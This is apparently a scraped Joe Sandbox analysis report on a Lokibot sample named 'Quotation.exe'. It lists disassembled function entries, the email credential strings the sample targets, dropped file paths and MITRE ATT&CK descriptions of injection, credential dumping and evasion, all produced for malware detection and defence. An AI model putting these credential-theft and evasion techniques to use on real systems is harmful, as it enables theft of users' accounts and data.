Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

EmailAddress, xrefs: 0040D074
SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA
SmtpServer, xrefs: 0040D0DC
PopServer, xrefs: 0040D099
PopPassword, xrefs: 0040D0D0
SmtpPassword, xrefs: 0040D117
Technology, xrefs: 0040D08D
PopAccount, xrefs: 0040D0B6
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
Quotation.exe

Function 0260F958 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Function 05A20142 Relevance: 1.6, APIs: 1, Instructions: 111
injectionCOMMON

Function 05A20148 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 0260FDE8 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 05A2003A Relevance: 1.6, APIs: 1, Instructions: 98
memoryCOMMON

Function 05A20040 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Function 0260FCD8 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Function 05A20280 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Function 05A20288 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre